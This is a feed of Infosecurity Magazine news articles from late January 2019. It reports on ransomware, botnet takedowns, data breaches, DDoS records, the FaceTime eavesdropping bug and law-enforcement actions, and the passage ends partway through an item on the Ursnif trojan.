Info Security

Subscribe to Info Security  feed
Updated: 2 hours 11 min ago

Japan to Hack IoT Ahead of 2020 Olympics

Thu, 01/31/2019 - 17:22
Japan to Hack IoT Ahead of 2020 Olympics

The Japanese government approved an amendment to allow government workers to hack into citizens’ internet of things (IoT) devices as part of efforts to improve cybersecurity ahead of the 2020 Tokyo Olympics.

Beginning next month, devices in people’s homes and offices will be subject to government scrutiny, whereby members of the National Institute of Information and Communications Technology will create usernames and passwords as they try to hack into upwards of 200 million devices, such as routers and webcams, according to NHK World.

According to a report from the Ministry of Internal Affairs and Communications Cyber-Security Office, two-thirds of the cyber attacks in Japan in 2016 targeted IoT devices. The heightened risk to connected devices at high-profile events like the Olympics has sparked a desire to mitigate risks with a heightened degree of urgency.

“IoT security is one of the greatest challenges we face today. IoT has gone unregulated and largely unsecured to date. That, paired with the sheer number and types of the devices being networked and connected to cloud interfaces and on-the-internet APIs and you have a perfect storm. A radical shift in approach is needed,” said Ashish Gupta, CEO, Bugcrowd.

“In Japan, which will soon be hit with an influx of visitors for the Olympic Games, the government has taken decisive action to make its citizens and visitors more secure. It’s not the first time a government has stepped in to help improve security for the country – this approach is similar to what Australia did with the hajime worm in 2017.

“While this is relatively novel to take this approach at this scale, many organizations take a similar approach – albeit on a smaller scale – and for good reason. Employee negligence when it comes to security is one of the biggest cybersecurity risks to businesses. Having a robust and proactive security posture is critical in today’s climate.”

Categories: Cyber Risk News

Matrix Ransomware: A Threat to Low-Hanging Fruit

Thu, 01/31/2019 - 16:53
Matrix Ransomware: A Threat to Low-Hanging Fruit

In its 2019 Threat ReportSophos predicted a rise in targeted ransomware attacks. According to new research, Matrix, a copycat targeted ransomware that is flying under the radar, is one such threat that has been observed targeting single machines.

The recent ransomware report, published by SophosLabs, identifies brute-force attacks on weak remote desktop protocols (RDP) as the common thread between various strains of targeted ransomware, including Matrix, BitPaymer, Dharma, SamSam and Ryuk.

Matrix doesn't spread through an organization like SamSam, however. “The attackers’ ransom demands are not embedded within the ransom note. Atypically, the threat actors require victims to contact them first, and submit some of the encrypted files from the victim’s computer, and only then provide the victims with a Bitcoin address and the ransom amount,” the report said.

Though not as sophisticated as more popular attacks, Matrix comes equipped with additional tools that help it to carry out its attack.

“The malware executable bundles within itself several payload executables it needs to accomplish its tasks. It uses RDP within the networks it has infected once it has gained a foothold inside the network. Among the embedded components are some free, legitimate systems administrator tools the malware uses to achieve some of its goals,” the report said.

Interestingly, the malware authors seem to lack a level of professionalism notable in other malware authors, such as those who penned SamSam. With Matrix, researchers have seen several changes and mistakes during their monitoring of 96 samples of the malware. In some cases, the authors completely abandoned features that they had experimented with.

Also, the malware doesn’t seem to have a particular geographical distinction. “The country where the most customers encountered the malware was the United States (27.7% of Matrix detections came from the U.S.), followed by Belgium (16.7% of the detections),” the report said, but it has also been detected on machines in Taiwan, Singapore, Germany, Brazil, Chile, South Africa, Canada, and the UK.

The researchers reportedly played the role of a victim and contacted the malicious actors who demanded they pay that day's value of a Bitcoin and refrain from asking "stupid questions." However, "the authors' initial sassy attitude eventually morphed to a kind of desperation, as they continued to email us and dropped their ransom demand by nearly a third after we stopped responding to their messages."

Categories: Cyber Risk News

Report: Majority of Small UK Businesses ‘Ignoring GDPR Risks’

Thu, 01/31/2019 - 13:25
Report: Majority of Small UK Businesses ‘Ignoring GDPR Risks’

Most small businesses in the UK have not updated or reviewed their data security and privacy policies since the GDPR came into force, according to new research from tech firm Appstractor.

The Under Attack: Assessing the struggle of UK SMBs against cyber criminals report assessed the views of 500 IT bosses at small UK companies and revealed the majority are ignoring GDPR risks seven months after the new rules were officially introduced.

Three quarters of those polled said their company is yet to take any action to improve how they store data, with a quarter of businesses having no plans to do so at all.

The findings make for concerning reading, particularly given research published by the Federation of Small Businesses prior to GDPR coming into force which claimed that 90% of small business were not GDPR-compliant.

Paul Rosenthal, CEO of Appstractor, said: “Small businesses have long been in denial about the threat they face from cyber-criminals and it seems this denial has carried over into the risk GDPR carries.

“It is not just the financial risk and the fines that can be imposed under GDPR, but businesses now have a responsibility to report a security breach to those whose data has been put at risk. The reputational damage alone of being known as a company that can’t keep its customers’ data safe can be enough to sink a small business before any financial fines are imposed.”

Whatever steps they decide to take, smaller businesses should at least be reviewing how they gather, store and secure customer data to ensure they are as compliant as possible, Rosenthal added. “Unfortunately, it seems many are not taking GDPR seriously enough which could have serious consequences.”

Categories: Cyber Risk News

US Launches Major Effort to Disrupt North Korean Botnet

Thu, 01/31/2019 - 10:54
US Launches Major Effort to Disrupt North Korean Botnet

The US authorities have begun notifying victims of a notorious botnet run by North Korean state-sponsored hackers, as their efforts to disrupt the hermit nation's malicious activity increase.

A court order allowed the FBI and officers from the US Air Force Office of Special Investigations (AFOSI) to operate servers mimicking other peers in the Joanap botnet.

This enabled them to map the extent of the botnet and where infected machines are. The next stage is to notify the owners of those machines, most of whom will have no idea they’re unwittingly aiding a foreign power’s hacking campaigns.

The FBI is coordinating this process via ISPs and in some cases direct communications with the individuals, as well as communicating with foreign governments in cases where victims live abroad.

The Joanap botnet has been in operation since 2009, enabled by the first-stage Brambul worm which targets poorly secured Windows machines.

The latter spreads via a list of hard-coded log-in credentials, which it uses to brute-force its way into SMB shares. Once Joanap is dropped it goes on to scan for other potential victims.

The Joanap malware is a fully functional RAT able to receive multiple commands and linked by the US authorities to North Korean "Hidden Cobra" actors.

It enables them to exfiltrate data, drop additional payloads, initialize proxy communications on a compromised Windows device, manage files, processes and nodes and create and delete directories.

According to a US-CERT alert in May 2018, Joanap had been found on 87 compromised network nodes in countries including China, Spain, Sweden, India, Brazil and Iran.

“Our efforts have disrupted state-sponsored cyber-criminals who used malware to establish a computer network that gave them the ability to hack into other computer systems,” said US Attorney Nicola Hanna.

“While the Joanap botnet was identified years ago and can be defeated with anti-virus software, we identified numerous unprotected computers that hosted the malware underlying the botnet. The search warrants and court orders announced today as part of our efforts to eradicate this botnet are just one of the many tools we will use to prevent cyber-criminals from using botnets to stage damaging computer intrusions.”

Categories: Cyber Risk News

Airbus Staff Caught in Data Breach

Thu, 01/31/2019 - 10:21
Airbus Staff Caught in Data Breach

Airbus has revealed it has been the subject of a cyber-attack affecting its commercial aircraft business, which has compromised employee information.

The aerospace giant revealed in a brief statement that it had notified the relevant authorities, mindful of the need to contact GDPR regulators within 72-hours of discovering a breach.

However, there’s not much else to go on.

It claimed that a cyber-incident on the IT systems of its commercial aircraft business resulted in unauthorized access to data.

“This incident is being thoroughly investigated by Airbus’ experts who have taken immediate and appropriate actions to reinforce existing security measures and to mitigate its potential impact, as well as determining its origins,” it continued.

“Investigations are ongoing to understand if any specific data was targeted, however we do know some personal data was accessed. This is mostly professional contact and IT identification details of some Airbus employees in Europe.”

Airbus staffers, of whom there are roughly 130,000 worldwide, have been told to “take all necessary precautions going forward.” However, there’s no word yet on whether the incident was more serious in scope.

Alongside US firm Boeing, the European giant is the world’s leading manufacturer of commercial aircraft for carriers, delivering a record 800 planes to 93 customers in 2018.

That could make its IP of great value to hackers, according to Max Vetter, chief cyber officer at Immersive Labs.

“A huge amount of capital is poured into R&D in such organizations, a cost which malicious actors can circumvent by trying to steal the resulting data,” he argued.

“It is known that some nation states have been using this kind of espionage to speed up the production of technology for years. For this reason, it is crucial that technical countermeasures and cyber-skills are continually refined to keep pace with attackers."

Airbus claimed, however, that the attack had made “no impact” on its commercial operations.

Back in 2015, Airbus was forced to issue an Alert Operator Transmission (AOT) to all operators of a new A400M cargo plane to check the software in their engines, after a fatal crash on a test flight in Spain.

Categories: Cyber Risk News

New UK Fraud Rules Set to Empower Victims

Thu, 01/31/2019 - 09:54
New UK Fraud Rules Set to Empower Victims

New rules come into force in the UK today designed to provide consumers with stronger powers of redress in the event they fall victim to authorized push payment (APP) fraud.

Regulator the Financial Conduct Authority (FCA) has mandated that fraud victims can now complain to the bank that receives funds sent in error to a scammer, as well as their own bank.

Both banks have to receive the complaint, with the consumer able to escalate their case to the Financial Ombudsman Service (FOS) if they’re not happy.

APP fraud occurs when an account holder is tricked into making a payment to another account, such as in BEC or CEO fraud.

There are two main types: with malicious payee fraud the victim authorizes a payment for what they believe to be legitimate purposes, but it’s actually a scam; while in malicious redirection the victim intends to pay a legitimate payee but the fraudster directs them to pay a third party instead.

APP fraud losses jumped 44% between the first half of 2017 and the same period last year to reach £145m in the first six months of 2018, according to UK Finance.

The banking group argued last year that the government should levy a payments tax to create a fund which could be used by the industry to compensate the growing number of victims.

The FOS has claimed in the past that a common strategy of the banks in APP disputes — to blame the customer — is increasingly difficult to do given the sophistication of scams.

A new voluntary code is being drawn up for the industry, which should also clarify when lenders are liable to pay up.

These will include a duty of care placed on the part of the banks, including processes to confirm the name on the destination bank account.

“This industry collaboration is key to tackling fraud and improving outcomes for consumers and businesses alike,” argued Equifax head of ID & fraud, Keith McGill.  

“These new [APP] rules will directly benefit consumers falling victim to this type of fraud by giving them stronger redress with the recipient bank or building society being used by the fraudster, in addition to their own.”

Categories: Cyber Risk News

Third-Party Breaches Plague Multiple Industries

Wed, 01/30/2019 - 17:01
Third-Party Breaches Plague Multiple Industries

From January 25 to 28, 2019, multiple organizations, including Discover Financial Services, Verity Medical Foundation, Verity Health Systems and Allen Chern LLP, have made routine filings in accordance with California state law, reporting cybersecurity incidents that may or may not be data breaches, according to the office of the Attorney General (AG).  

The AG’s website notes, “In some cases the organization that sent the notice is not the one that experienced the breach,” and each of the companies that have filed in the past five days has asserted the information was compromised as a result of some unauthorized activity of a third-party vendor.

“Discover was not breached in this incident and our information and data systems were not compromised. This incident was the result of a merchant data compromise, and not the result of any action by Discover or an intrusion of our customer information systems,” a Discover spokesperson wrote in an email.

“We re-issued cards out of an abundance of caution for our cardholders. Our notices to all customers state that 'this breach did not involve Discover card systems.'”

According to Colin Bastable, CEO of Lucy Security, third parties are the CISO’s Achilles' heel. “It appears to be a classic case of a third party’s failure to protect Discover Card customer data. Discover is not going to feel it, but the buck has stopped somewhere down their food chain.”

Health records and payment card data are some of the most highly sought-after data for sale on the dark web, and “these kind of breaches create a lot of stress on both the issuers’ side and on consumers – regardless of whether an issuer was actually the target of a breach or a merchant in the network,” said Felix Rosbach, product manager at comforte AG.

“It’s crucial to protect sensitive data over the entire data lifecycle – from the POS device to processing to backup. Implementing data-centric security, which means protecting data at the earliest possible point and de-protecting it only when absolutely necessary, is the only way forward.”

Still, enterprises continue to trust that their data is secure when put in the hands of its partners, often without having done a thorough review of the security practices of their downline vendors.

“Until the market adopts a more sophisticated approach to third-party cyber-risk management that provides visibility at scale and with cost efficiency, these incidents will continue to occur frequently," said Fred Kneip, CEO, CyberGRX.

Categories: Cyber Risk News

65 Fortune 100s Downloaded Flawed Apache Struts

Wed, 01/30/2019 - 16:45
65 Fortune 100s Downloaded Flawed Apache Struts

Despite Apache Struts releasing multiple updates to its software in the nearly two years since the Equifax breach, Sonatype published research which found that between July and December 2018, two-thirds of the Fortune 100 companies downloaded the same vulnerable version of Apache Struts that was used in the infamous Equifax breach, according to an email from Sonatype.

“According to our analysis of The Central Repository (defacto repository of Java components used by all the popular Java build tools as the source of the components by default), over last 6 months of 2018 – we saw 65 of the Fortune Global 100 have downloaded vulnerable versions of Struts,” a spokesperson wrote.

“Beyond Struts, this problem of electively consuming known vulnerable open source components is a large issue that extends across all industries.  In 2018, Sonatype (Central report again) and npm reported that 12.1% of Java open source components and 51% of JavaScript npm packages downloaded had known vulnerabilities. Equifax is actually now leading the charge and taking action to manage their software supply chains. While Equifax has changed, too many others haven't learned their lesson; it's clear that the cost of inaction, is massive,” according to the spokesperson.

“The scope of companies that are still using CVE-2017-5638 demonstrates the importance of vulnerability identification. A researcher in our Crowd of ethical hackers identified CVE-2017-5638 months before the Equifax breach and submitted that information to one of our customers, a major worldwide financial services company. As a result, the customer remediated the vulnerability before a bad actor could take advantage of it,” said Ashish Gupta, CEO of Bugcrowd.

Vulnerability disclosures are intended to raise awareness and help to mitigate risks. After the Equifax breach, it was expected that more companies would have taken security seriously.  

“We found the same vulnerability in major credit company’s environment several months before the Equifax breach and help prioritize and remediate the issue well before the company faced any reputational or financial risk from this vulnerability,” Gupta said.

“Since then we have worked with our researchers and other customers to further protect themselves from the Struts vulnerability successfully. If you haven’t already done so, anyone with Apache Struts in their environment should patch immediately. The best protection against such a breach is a layered defense-in-depth approach, a strong SDL (security development lifecycle) for all application development including a bug bounty. The security research community wants to help organizations find and fix these issues.”

Categories: Cyber Risk News

Digital Growth Exposes Firms to Complexity and Threats

Wed, 01/30/2019 - 11:23
Digital Growth Exposes Firms to Complexity and Threats

Digital transformation is exposing organizations to greater IT complexity and cyber-risk, according to new global research from Thales eSecurity.

The security vendor polled 1200 execs with responsibility for IT and data security in nine countries around the world to compile its 2019 Thales Data Threat Report.

It found that over a third (39%) class themselves as belonging to one of the two most advanced digital transformation categories defined by report author IDC. This means they’re either “aggressively disrupting” markets or embedding digital into the enterprise to become more agile.

Nearly all (97%) admitted they will use sensitive data in these emerging technologies. This is a major risk, given that traditional corporate network perimeters are a thing of the past as more fluid cloud and mobile technologies dominate.

It’s also a concern given that these new digital platforms can add greater complexity, according to the vendor. For example, 40% of firms polled are using multiple cloud platforms across SaaS, PaaS and IaaS models.

Respondents also claimed “complexity” was the number one perceived barrier to implementing data security.

It’s perhaps not surprising that 86% of the IT executives surveyed admitted their organization is vulnerable to data security threats, with over a third (34%) claiming they’re “very” or “extremely” at risk.

These aren’t theoretical risks: 60% of respondents claimed to have been breached in the past, including 34% in the past year.

Despite the risks, less than 30% currently use encryption, despite it being one of only two technologies named explicitly in the GDPR.

Organizations are splitting their efforts between different layers of the IT environment, spending on average 36% of their time on networks, 34% on data, and 30% on application security.

The report also warned that only half of global firms expect to see an increase in their IT security budgets.

“Our research shows that no organization is immune from data security threats and, in fact, we found that the most sophisticated organizations are more likely to indicate that they have experienced a data security breach,” argued IDC research VP, Frank Dickson.

“This trend is consistent no matter how we define the sophistication of the audience: those who are spending more on IT security, those for whom data security is a larger portion of their security budget, or those who are further along in their digital transformation journey.”

Categories: Cyber Risk News

Global Ransomware Attack Could Cost $193 Billion

Wed, 01/30/2019 - 10:35
Global Ransomware Attack Could Cost $193 Billion

A major global ransomware attack could cost organizations an estimated $193bn, with those in the US worst affected, according to a new cyber-risk report.

Bashe attack: Global infection by contagious malware, was produced by the Singapore-based Cyber Risk Management (CyRiM) project, of which Lloyd’s of London and other insurers are founding members.

It paints a scenario not unlike WannaCry or NotPetya, in which a ransomware ‘worm’ goes global, causing untold damage.

The report’s hypothetical attack begins with a malicious email directed at one organization, which is opened, triggering the ransomware download. The malware then spreads itself to connected networks and forwards itself to all contacts.

The report estimates that as many as 600,000 businesses globally could be affected by such an attack, with the resulting financial damage hitting anywhere between $85bn and $193bn.

In the most severe scenario, US organizations lose $89bn, European firms suffer $76bn in losses and those in Asia escape relatively lightly with a $19bn hit.

In this scenario, retail and healthcare (both $25bn) would be the worst affected industries, with payment system disruption crippling commerce and lengthy delays in recovery due to infection of legacy healthcare IT systems.

Manufacturing is the next most impacted sector, suffering $24bn in losses thanks to encryption of production equipment and inventory management systems. This will also have a major knock-on impact for the supply chain, the report claimed.

With a staggering 86% of total economic losses currently uninsured, organizations could be on the hook for $166bn if such an attack hit home, the report concluded.

Ed Macnair, CEO of CensorNet, argued that with the right email security, most organizations could mitigate the risk of a global threat on this scale.

“This research has been based on a phishing attack and the kind of spread they are talking about would be prevented if just a couple of companies had email security in place. The chances are many more than that do,” he claimed.

“Cyber insurance is a good idea to have, but without preventative tools in place it’s the same as insuring your home contents and leaving the door unlocked. It’s there as a back-up and, if you do everything right, shouldn’t be needed.”

Categories: Cyber Risk News

Global Police Close Notorious Online Marketplace

Wed, 01/30/2019 - 09:53
Global Police Close Notorious Online Marketplace

Europol and the FBI are celebrating this week after announcing the takedown of a notorious marketplace for breached server credentials.

The xDedic site was first revealed back in 2016 when Kaspersky Lab was tipped off by a European ISP. The security vendor claimed it provided a platform for the trade of log-ins to as many as 70,000 corporate and government servers, starting at just $6.

Users could search for servers by various criteria including price, OS and geographic location. Affected organizations including hospitals, governments, law firms, universities and many more.

With control of these organizations' servers, cyber-criminals could launch DDoS, click fraud, crypto-mining and other attacks. It’s claimed that xDedic enabled over $68m in fraud, with those behind the marketplace are said to have made a commission on each sale.

Last year, police in Belgium and Ukraine, backed by Europol, signed a Joint Investigative Team agreement. Together with the FBI, they tracked down and last week seized the servers used by xDedic’s administrators, while Ukrainian police announced key arrests.

The German Bundeskriminalamt provided assistance also helped with the server seizures, while in the US, the FBI was aided by the Immigration and Customs Enforcement’s Homeland Security Investigations and the Florida Department of Law Enforcement, alongside the Department of Justice’s Office of International Affairs and the Criminal Division’s Computer Crime and Intellectual Property Section.

While the news is a welcome reminder of the success that can come from co-ordinated law enforcement work, it would be wise not to overstate its significance, according to Hi-Tech Bridge CEO, Ilia Kolochenko.

"Unfortunately, this is just a drop in the ocean of the stolen data market. Other similar markets and platforms of different sizes exist, including more discreet ones where one can buy virtually anything including access to breached law enforcement systems and stolen data. Worse, cyber-criminals will certainly learn a lesson and move their data and servers to other jurisdictions immune to justice,” he argued.

“We should treat the root cause of skyrocketing cybercrime – growing economic inequality and global poverty. Otherwise, while we dig up standalone trees, a dark forest will grow behind. Hopefully, the seized data will shed some light on previously unknown data breaches and help to investigate them." 

Categories: Cyber Risk News

Largest DDoS Attack Sent Over 500 Million Packets per Second

Wed, 01/30/2019 - 08:00
Largest DDoS Attack Sent Over 500 Million Packets per Second

A distributed denial-of-service (DDoS) attack discovered by Imperva had unleashed more than 500 million packets per second (Mpps), which is believed to be the largest packets-per-second (PPS) attack on record.

According to research released today, last year’s DDoS attack on GitHub rang in at 1.35 terabits per second, making it the largest DDoS attack ever at the time. According to Imperva, though, the ability to mitigate a DDoS attack has more to do with the number of packets directed at a network than it does with the amount of bandwidth.

“Packets per second is the true measure of the attack intensity, and that is what is difficult to block and recover from,” researchers wrote. “When it comes to DDoS protection, bandwidth is not everything. The most demanding attacks are high-volume PPS attacks, because with more packets to process, you need more network hardware and other resources to mitigate them.”

Attacks with greater PPS are actually more difficult to handle for businesses than large-scale attacks, so cyber-criminals are deploying attacks as small as 10 Gbps with great success. Akamai researchers came to the same conclusion when they took a look back at the DDoS trends of 2018.

“When people think of DDoS attacks, they focus on the outliers, the massive Terabit attacks that generate headlines. But the smaller, more focused attacks can do just as much damage. More importantly, these smaller attacks are actually more common than their larger-scaled counterparts,” said a January 28 Akamai blog post.

In fact, the packets sent in the attacks that were analyzed totaled more than four times the volume of packets sent at GitHub last year, resulting in a depletion of network resources, which researchers say is easy to achieve.

A DDoS attack can be launched within a matter of minutes...and overwhelm the vast majority of websites or enterprise networks,” researchers wrote.

In the DDoS attacks Imperva analyzed, “it was the 500 million packets-per-second torrent directed at our customer – the highest volume ever recorded – that made it so intense, and the real challenge to overcome.”

Categories: Cyber Risk News

Info-Stealing FormBook Returns in New Campaign

Tue, 01/29/2019 - 18:15
Info-Stealing FormBook Returns in New Campaign

A file-hosting service registered within the last week is being used to spread information-stealing malware in another FormBook campaign, currently attacking retail and hospitality businesses both within and outside of the US, according to Deep Instinct.

Though FormBook has been around since approximately 2016, this newest version is being discussed and shared in underground hacking forums as a recommended service for hosting and serving malware. In a blog post, researchers wrote, “As with many information stealing and credential harvesting malware, FormBook’s infection chain starts with a phishing Email containing a malicious attachment, which is usually an Office document or a PDF file.”

The campaign uses rich text format (RTF) documents and leverages recent Word vulnerabilities as droppers, likely because these are often missed by typical security solutions, according to Deep Instinct. Once the payload is dropped and executed, it will copy itself, then proceed to scan the system for stored passwords in browsers and various other applications before sending the stolen information back.

In addition, the malware takes a screenshot of the victim’s desktop, along with monitoring all browsers for user-typed passwords, stealing those as well. It will also act as a keylogger and maintain a log of the user’s keystrokes.

“This time around, [FormBook] is using a new malware-friendly file hosting services, which seems to be quickly gaining popularity among other threat actors. We strongly suggest employing a zero-trust policy with respect to the service DropMyBin until other information becomes available,” researchers wrote.

FormBook’s low price is attractive, in particular because there’s pretty big bang for your buck, according to underground hacking forums. The malware combines sophisticated evasion capabilities with its powerful credential harvesting mechanism, making it attractive to attackers. All of the droppers and payloads discovered in the research are listed among the indicators of compromise (IoCs).

Categories: Cyber Risk News

Attackers Exploit Zero-Day in WordPress Plugin

Tue, 01/29/2019 - 16:55
Attackers Exploit Zero-Day in WordPress Plugin

After being abandoned by its creator, WordPress plugin Total Donations is reportedly being compromised by attackers who are leveraging a zero-day exploit, according to Wordfence.  

Researchers confirmed that malicious actors are able to gain administrative access to affected WordPress sites via the CVE-2019-6703 vulnerabilities in all versions of the plugin, including 2.0.5.

“Total Donations was suspended from the CodeCanyon marketplace in late 2017 following a lack of support from the developers, so it had been disabled for over a year when it showed up on my radar. Because of the severity of the issues present in the plugin and the fact that no patch is likely to come, it is our recommendation that site owners delete Total Donations from their sites entirely," Wordfence's Mikey Veenstra wrote in an email. 

"WordPress is typical of many popular platforms where businesses only control a small portion of the code they rely upon,” said Satya Gupta, CTO and co-founder, Virsec. "Ensuring that there is no unpatched or vulnerable code in this stack is nearly impossible. While it’s always a good idea to heed these alerts and disable or patch vulnerable code wherever possible, businesses need application defenses that protect sensitive processes, even if there are underlying flaws."

In this particular case, it doesn’t appear as though a patch is possible, given that the developers can’t be reached, according to Wordfence. “There currently do not appear to be any legitimate means of acquiring the latest version of Total Donations. The plugin’s homepage currently displays a Coming Soon page, featuring a mockup image of a new website. The upload path of this image implies the site has been in this state since May 2018."

While some plugin marketplaces continue to offer Total Donations for purchase, Evanto Market lists the plugin as no longer available.

A large open developer community presents different pros and cons, and the ability for developers to abandon products is a huge problem with tools like WordPress and others, Gupta said. Developers can create lots of useful plugins to solve specific problems, “but if there isn’t a commitment to long-term support, many of these tools become liabilities. Any time you change a plugin it can cause unintended disruption and problems. Many businesses end up staying with unsupported tools until they actually break to avoid these headaches."

Categories: Cyber Risk News

Group FaceTime Disabled While Apple Works on Fix

Tue, 01/29/2019 - 16:37
Group FaceTime Disabled While Apple Works on Fix

A flaw in Apple’s FaceTime app allows users to spy on each other, which has resulted in a Twitter-storm of tweets encouraging iPhone users to disable FaceTime while Apple works on a fix.

Infosecurity contacted Apple, but the company has not responded with comment. According to Apple’s system status page, FaceTime is experiencing an ongoing issue, which one Twitter user demonstrated in a live video. The vulnerability reportedly is impacting OS devices running iOS 12.1 or later, which began on January 28, 2019, at 10:16 pm. As a result, the group FaceTime feature is temporarily unavailable.

Additionally, given the widespread popularity of Apple’s iPhone, New York’s governor, Andrew Cuomo, has issued a consumer alert warning the public that the vulnerability allows other users to receive audio from the device being called, even before the call is answered. 

"The FaceTime bug is an egregious breach of privacy that puts New Yorkers at risk," Governor Cuomo said in the alert. "In New York, we take consumer rights very seriously and I am deeply concerned by this irresponsible bug that can be exploited for unscrupulous purposes. In light of this bug, I advise New Yorkers to disable their FaceTime app until a fix is made available, and I urge Apple to release the fix without delay."

To disable FaceTime, go to settings, and scroll down to FaceTime. Click on the slide to the app off (the slide will no longer be green).

“This bug illustrates the privacy issues caused by surrounding ourselves with devices containing cameras and microphones. Phones, tablets, laptops, smart TVs, and smart speakers contain microphones that can be listening to you at any point,” said Amit Sethi, senior principal consultant at Synopsys.

“If the software on the devices is not malicious and doesn’t contain bugs like this, the microphones should only be on at times you expect. While security controls like permissions and app store reviews are in place, these are not perfect. The problem is that users don’t know when these devices are listening, as most modern devices don’t have an indicator like a LED that turns on whenever the camera and/or microphone is on.

"This is simply the price we pay for the convenience and features that these Internet-connected devices provide. If you need to be 100% certain that you aren’t being recorded, don’t have any Internet-connected devices with microphones or cameras around.”

Categories: Cyber Risk News

UK Government Pledges Security Skills and R&D Funding

Tue, 01/29/2019 - 11:04
UK Government Pledges Security Skills and R&D Funding

The UK government has pledged more money to address the IT security skills crisis and improve hardware and IoT security, although details on the latter are vague.

An announcement made on Data Protection Day yesterday claimed the UK plans to be a world leader in “designing out” cyber-threats, by funding R&D into more secure-by-design hardware and chips.

The £70m investment will be made through the Industrial Strategy Challenge Fund and backed by further investment from industry, although there were no further details.

An additional £30m will be made available for the Ensuring the Security of Digital Technology at the Periphery program, to improve IoT security.

“We want the UK to be a safer place to live and work online. We’re moving the burden away from consumers to manufacturers, so strong cybersecurity is built into the design of products,” said digital minister, Margot James.

“This funding will help us work with industry to do just that, improving the strength and resilience of hardware to better protect consumers from cyber-attacks.”

The announcement was greeted with skepticism in some quarters.

“The announcement that the UK will become a leader in cybersecurity resulting from a small investment in research is highly unlikely as hardware and research alone is not going to solve cybersecurity threats,” argued Joseph Carson, chief security scientist at Thycotic.

“The solution to reducing cybersecurity threats is a balance between both technology and people. If we are really going to reduce the threats then it needs to start with an investment in education along with a strong investment in technology that is simple, easy to use and does not require highly skilled workforce to use it.”

The government also pledged £500,000 as part of the next round of the Cyber Skills Immediate Impact Fund.

The money is designed to help improve diversity and reduce skills shortfalls in the information security sector.

Projects set to receive the funding include Crucial Academy, which aims to retrain veterans: focusing on women, neurodiverse and BAME individuals. Also on the list are the QA: Cyber Software Academy for Women and BluescreenIT’s HACKED program, which helps to train candidates with special needs, from disadvantaged backgrounds, and those classed as neurodiverse.

Sarah Armstrong-Smith, head of continuity and resilience at Fujitsu UK, welcomed the pledge for more funding.

“With cyber-criminals becoming more creative and savvy in their approach to cyber-attacks, a cybersecurity team which lacks diversity is more likely to leave a company vulnerable to attacks,” she argued.

“Different groups of people bring a variety of ideas and ways of thinking, which means that a more diverse and inclusive cybersecurity team will be key in facilitating a broader range of ideas and perspectives about how to prevent an attack from taking place.”

Categories: Cyber Risk News

US Turns Up Heat on Huawei with 23-Count Indictments

Tue, 01/29/2019 - 10:33
US Turns Up Heat on Huawei with 23-Count Indictments

The US Department of Justice has unsealed charges against Huawei and its CFO covering separate alleged conspiracies to break sanctions on Iran and to steal trade secrets from T-Mobile USA.

The charges were widely expected, but will do nothing to warm relations between the world’s superpowers at a time of growing tension over trade and cyber-espionage.

The first, 13-count indictment charges Huawei, affiliates Huawei Device USA and Skycom, and CFO Meng Wanzhou, also the daughter of founder Ren Zhengfei.

She is charged with bank fraud, wire fraud, and conspiracies to commit bank and wire fraud, while Huawei and Skycom are charged with: bank fraud and conspiracy to commit bank fraud, wire fraud and conspiracy to commit wire fraud, violations of the International Emergency Economic Powers Act (IEEPA) and conspiracy to violate IEEPA, and conspiracy to commit money laundering.

Prosecutors allege that the company had been lying about its relationship with a company in Iran (Skycom) since 2007, claiming that it was not a Huawei affiliate. It’s also alleged that as part of this deception, Meng made a presentation to an executive of one of Huawei’s major banking partners repeatedly making the false claims.

It’s alleged that one bank cleared over $100m worth of Skycom-related transactions through the US between 2010 and 2014.

The lies are said to have extended to Huawei providing false information to Congress on its activities in Iran and obstructing justice last year by moving witnesses with knowledge of the affair back to China, as well as “concealing and destroying” evidence.

The second, 10-count indictment charges Huawei with a conspiracy to steal trade secrets, attempted theft of trade secrets, seven counts of wire fraud, and one count of obstruction of justice.

It relates to an attempt to steal IP from then-partner T-Mobile related to its phone-testing robot “Tappy.” Engineers are said to have violated non-disclosure agreements by taking photos of the equipment and in one case stealing a piece of the device during a tour of the T-Mobile lab.

When T-Mobile threatened to sue, Huawei is said to have produced a report falsely claiming the theft was the work of “rogue actors” inside the company.

However, the indictment alleges that this was actually a long-running, company-wide effort that began in 2012. Prosecutors claim to have an internal company announcement that the firm offered bonuses to employees able to steal info from other companies, to be submitted via an encrypted email address.

A federal jury has already sided with T-Mobile in a 2017 civil case.

The rhetoric in the statements provided by the US side reflect the geopolitical nature of the cases.

“These charges lay bare Huawei’s alleged blatant disregard for the laws of our country and standard global business practices,” said FBI director Christopher Wray. “Companies like Huawei pose a dual threat to both our economic and national security, and the magnitude of these charges make clear just how seriously the FBI takes this threat.”

Huawei has denied the allegations.

Categories: Cyber Risk News

Global Police Crack Down on Webstresser Customers

Tue, 01/29/2019 - 10:02
Global Police Crack Down on Webstresser Customers

Europol has detailed how law enforcers across the globe are tracking down customers of notorious DDoS-as-a-service site webstresser.org.

The site was taken down in April 2018 as part of Operation Power OFF, but that gave police a trove of information on its 151,000 registered users. It’s claimed the marketplace helped customers launch over four million attacks for as little as €15 a month.

Countries taking action against DDoS are: Belgium, Croatia, Denmark, Estonia, France, Germany, Greece, Hungary, Ireland, Lithuania, Portugal, Romania, Slovenia, Sweden, Australia, Colombia, Serbia, Switzerland, Norway and the US.

The UK’s National Crime Agency is leading the way, having seized 60 devices in raids and readying action against 250 users of the site, Europol claimed.

In the Netherlands, the authorities are taking a more progressive approach, offering first-time offenders the opportunity to take part in a "Hack_Right" project to prevent them getting into more serious crime.

Elsewhere, the FBI last December disrupted other DDoS-for-hire sites including Downthem and Quantum Stresser, whilst Romanian police have identified the administrators of two smaller DDoS sites, seizing evidence including info on their customers.

Darren Anstee, CTO for security at Netscout, argued that it’s all too easy for malcontents to launch DDoS attacks via stressor and booter services like webstresser, and welcomed the concerted police action.

“This is exactly the kind of action that is needed, as it will dissuade others from simply ‘clicking the button’ to launch an attack — with no consideration of the consequence of that attack,” he added. 

“It should be noted however that this will only dissuade some from using these kinds of services, criminal behavior will persist, and DDoS attacks will continue. Every organization needs to take responsibility for ensuring the availability of their online services is adequately protected.”

Businesses should invest in the right people, process and technology to mitigate the DDoS threat, he added.

Categories: Cyber Risk News

Fileless Infection Steals Creds with Bank Trojan

Mon, 01/28/2019 - 18:01
Fileless Infection Steals Creds with Bank Trojan

A new variant of the password-stealing Ursnif bank Trojan has been found in the wild delivering fileless infections while remaining undetected, according to Cisco Talos Intelligence.

In a blog post, researchers wrote that the banking Trojan employs "fileless persistence which makes it difficult for traditional anti-virus techniques to filter out the C2 traffic from normal traffic. Additionally, Ursnif uses CAB files to compress its data prior to exfiltration, which makes this malware even more challenging to stop.”

